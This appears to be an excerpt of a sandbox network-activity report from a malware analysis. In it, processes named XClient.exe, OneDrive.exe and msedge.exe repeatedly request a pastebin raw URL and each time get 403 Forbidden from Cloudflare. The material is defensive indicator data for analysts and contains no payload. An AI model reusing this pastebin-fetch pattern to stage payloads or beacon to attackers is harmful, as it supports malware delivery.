Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: cMf8tm7AhsGQ5vWxR1aAj3I7/YSkj/pWKykFDWMuBkSWsLEsyOyKkKbLDRxipRD2T6RQvZFnMSW35ROA5huqOpzcU+97INS3hCkY939xCPU=$YgZ5ItHoa9QNEZVT8pMwsA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454378db27735-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7285
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 4Ti8asjhkVbs7Gd0/VLTus4EsZzYqYcaJh048eDUnBOQiEuxU2eLn+P0svAHbbi+DQU/zyQASs/8DQMEQeiRiKacgBCVMnRcJFGjjMTdZpA=$4Rig/lDheDuN/SRQ3FI2fQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045445eba66552-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: qfnty7aKZ7Yn6cn+eV4Fn2WKgsq2dRTYzCUygKKGrx2V/WB2hJo6ohpHzrldf05Q6csAt7SJmk6E2F6nZpJqC7rs8uUa+j7yKeF2Ws2G7rI=$kDZqTAI7fx4WFXgH2oTEhw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454480d57ef13-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7285
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: Dx1RKauoDQ7e3QBiNbONVWguG2zbgwABcL0mciONK3dn0TCEjvVjOT06gWCz5LY7EVulkPzoiegr0ENVatgXdzlzLmuKl2DjGyZa6wDNyY0=$RUEICweaz/66A301FcVv6g==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004544ada0888bb-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: hFmWFxavypKyl6PDynv8T4xweEny8EnylsnNFnV3e/GgC758iu/19XY+iy3DtBHd7PnnfOCzPVh8wWP2dfBaBOYbOacaHQaE5yGpxEdcOXI=$PZpRq2x2a9ErxhlPY+9Q0A==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004545949e8cd50-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: gXlZyrH2ITQNhmK9m9xArmOiwcvxUt3SkiFOdeWQyLJ0L0RdKkV7PqTvWhfBX6wPdc9z/Qlvpz6L9DBXaCqU6y9av3dVS8eskXDKNZ/3NPE=$tcjyeRVCtMlmJfmkT1azvg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004545b588079c4-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: jr5ZG+pAdXSrJhkEevQrIVK3zXsLpaXyErQeQAaZcS7meRGuxEwEGPa6aUZ3LLf2Cg/1yOpoRcRqgZ3RRWzpg2K5z+STZ2XFYN7vIbWW8u4=$qWLfO3KIOLYZvHU72w2q6Q==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004545e5f7260fb-LHR
DNS

43.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.229.111.52.in-addr.arpa

IN PTR

Response
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: WEEJrty/sgVVfVrkoAkeZoOn2ivvB7KK29PFbd0cKnHzfXX8AxlvzTz/kEOsiSXVlI0tR2PISwKOluz4azlv0NC7nrKAZBFrrEtpz9ukN+c=$NgDN417Vl603TS9mHVkz9Q==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004546ccd4e6550-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: rLTA3ixJx+6ljJX11rBhBpWdcOsmYgT0UnEPlj+VRZqyyeKRxPndpaAkGX/wkBow7DFL7HFM4gBNyCiKqaNzx9b+HPVYDjg1nppbITlvCRM=$+/9z4NQYBzlm9RV6Ukj5wg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004546ecfe89415-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: HvMeoScjbmnEGFBPomGJtQZuMPQNF/VDfNFIqc6NsxWXDdiquCaCRrbAnasYJz3sugS+OZJsJuDBKyuDzxW6UlgA6zk+BHh7DjmNKgJUJIo=$6X08MkVj22Y0uZJiZgSzgg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045471bb1288a7-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 69cXDC8WrRc6KUw3AShrS5yvwKxB2wVj1I6PFznsdpPBlhtxfLnUjs0wbfiAqffnftycJa/xlQ5CbLPZ9EyKC4GGSja8seMTHoUTZ68wMAs=$WDltewZzKmoDPb/nCLaqVA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004548029daef13-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: utFtWBShozg4r9Qfv8qqcvSi3+9rsViPEexsAacrdh3Tc2QzKEaLmcH060xixLNzlYH7ZBX32ep0Lojz6QiejlTeeY7yknhUXhS7N05dUSw=$GkEyzRadra/ZlfCur2/bIg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454823be093fc-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: HpEImEg1aoywbrvCjQYFRUFuah5T6GtJEQnE+P49PTZtV1UhCwPVb8jxJnNHUgpXH2O8MjSdMfDcbhDWI6bEBzSb5i3rdRS5BLEspA1SV3s=$+zR7RVHVPJFwvVrWifv5rw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045485187acd3d-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: /cJuLHWNNn9ulOtiv1YNFDP9QVI+jVqCGrE1GifDBnS+siM5Y8iiEkCK2q2pgcq9EQxx+ZmqPAbNEKJHQsii3ScEQ9hHF80uIDWZM1/J3RY=$KA1wGAmuzCI+Xml2scvfJw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454938b19cd1e-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
